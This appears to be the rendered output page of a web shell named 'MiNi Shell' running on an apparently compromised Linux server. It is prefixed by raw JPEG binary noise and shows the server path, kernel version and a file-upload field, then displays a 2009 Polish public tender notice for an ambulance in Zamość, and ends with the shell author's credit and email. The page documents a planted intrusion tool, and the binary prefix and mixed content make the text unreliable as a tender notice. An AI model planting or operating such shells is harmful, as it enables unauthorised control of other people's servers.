JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161841-N-2009.html

<p class="kh_header"><b>Zamość: Dostawa karetki transportowej typu T dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamosciu.</b><br>
<b>Numer ogłoszenia: 161841 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielna Publiczna Stacja Pogotowia Ratunkowego i Transportu Sanitarnego , ul. Starowiejska 23, 22-400 Zamość, woj. lubelskie, tel. 084 6384065, faks 084 6271196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie-zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa karetki transportowej typu T dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamosciu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa karetki transportowej typu T dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu.
Oferowana karetka musi spełniać:
warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 
   2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich 
   niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32, poz. 262), 
wymagania norm PN-EN 1789:2008 (w zakresie ambulansu typu A1) 
   i PN-EN 1865, oraz posiadać:
Świadectwo homologacji na pojazd skompletowany, 
parametry techniczno - użytkowe, określone w załącznikach Nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.11.41.21-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 4 000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy:
1) posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli 
    ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie 
    zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia wymagane celem potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu 
    o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych 
    z 29 stycznia 2004 r. z późn. zm. -  druk w załączeniu. 
2) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania
    o udzielenie zamówienie publicznego na podstawie art. 24 ust. 1 ustawy Prawo 
    zamówień publicznych z 29 stycznia 2004 r. z późn. zm. -  druk w załączeniu.

Dokumenty wymagane celem potwierdzenia, że wykonawca posiada uprawnienia 
do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
    do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
    do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony 
    nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego 
    oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
    Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie 
    zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
    lub społeczne; lub zaświadczenie, że wykonawca uzyskał przewidziane prawem 
    zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
    wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie
    wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.
   24 ust.1 pkt 4 - 8  ustawy (informacja musi dotyczyć wszystkich wymienionych 
   w dokumencie potwierdzającym status prawny wykonawcy członków władz), 
   wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
    24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert.
Dokumenty wymagane celem potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
1. Wykaz minimum trzech dostaw, wykonanych  w okresie ostatnich trzech lat 
    przed dniem wszczęcia przedmiotowego postępowania, a jeżeli okres 
    prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających 
    swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia
    z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i odbiorców 
    oraz załączenia dokumentów potwierdzających, że dostawy te zostały 
    wykonane należycie - druk w załączeniu.
Dokumenty wymagane celem potwierdzenia, że wykonawca znajduje się w sytuacji 
ekonomicznej i finansowej, zapewniającej wykonanie zamówienia:
1. Informacja z banku, lub spółdzielczej kasy oszczędnościowo-kredytowej,
    w której wykonawca posiada rachunek, potwierdzająca wysokość posiadanych
    środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą 
    niż zaoferowana wartosć przedmiotu zamówienia, wystawiona nie wcześniej niż 
    3 miesiące przed upływem terminu składania ofert.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  ma zastosowanie § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane. Dokumenty należy składać w formie oryginałów lub kopii, poświadczonej za zgodność z oryginałem przez uprawnionego przedstawiciela wykonawcy. 
Pozostałe dokumenty, informacje i oświadczenia, które musi zawierać oferta :
1) wypełniony formularz oferty wg załączonego druku,
2) wypełniony formularz z oferowanymi parametrami techniczno-użytkowymi
    na  załączonym druku,
3) Dane o Wykonawcy - wg załączonego druku,
4) Dowód wpłaty wadium,
5) Świadectwo homologacji na pojazd skompletowany - załączyć komplet
    dokumentów, 
6) Oświadczenie, że oferowana karetka transportowa spełnia:
    warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 
      2002 r. w sprawie warunków technicznych pojazdów, zakresu ich niezbędnego 
      wyposażenia (Dz.U. Nr 32 , poz. 262 z 2003 r.), wymagania określone w normie PN-EN 1789-2008 (w zakresie ambulansu typu
       A1) i 1865 - w zakresie odpowiednim do niniejszego postępowania,
     posiada wymagane parametry techniczno - użytkowe, określone 
      w załączniku Nr 1,
7) Oświadczenie wykonawcy o akceptacji wymaganych przez zmawiającego
    warunków, świadczonych przez serwis gwarancyjny i pogwarancyjny, 
    określonych w projekcie umowy;
8) Oświadczenie o nieudostępnianiu informacji stanowiących tajemnicę 
    przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
    oraz wykaz tych informacji - art.11 ust. 4 ustawy o zwalczaniu nieuczciwej 
    konkurencji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pogotowie-zamosc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielna Publiczna Stacja Pogotowia Ratunkoweo i Transportu Sanitarnego 
ul. Satrowiejska 23, 22-400 Zamosć, pokój 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 12:00, miejsce: Samodzielna Publiczna Stacja Pogotowia Ratunkoweo i Transportu Sanitarnego 
ul. Satrowiejska 23, 22-400 Zamosć, pokój 211 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com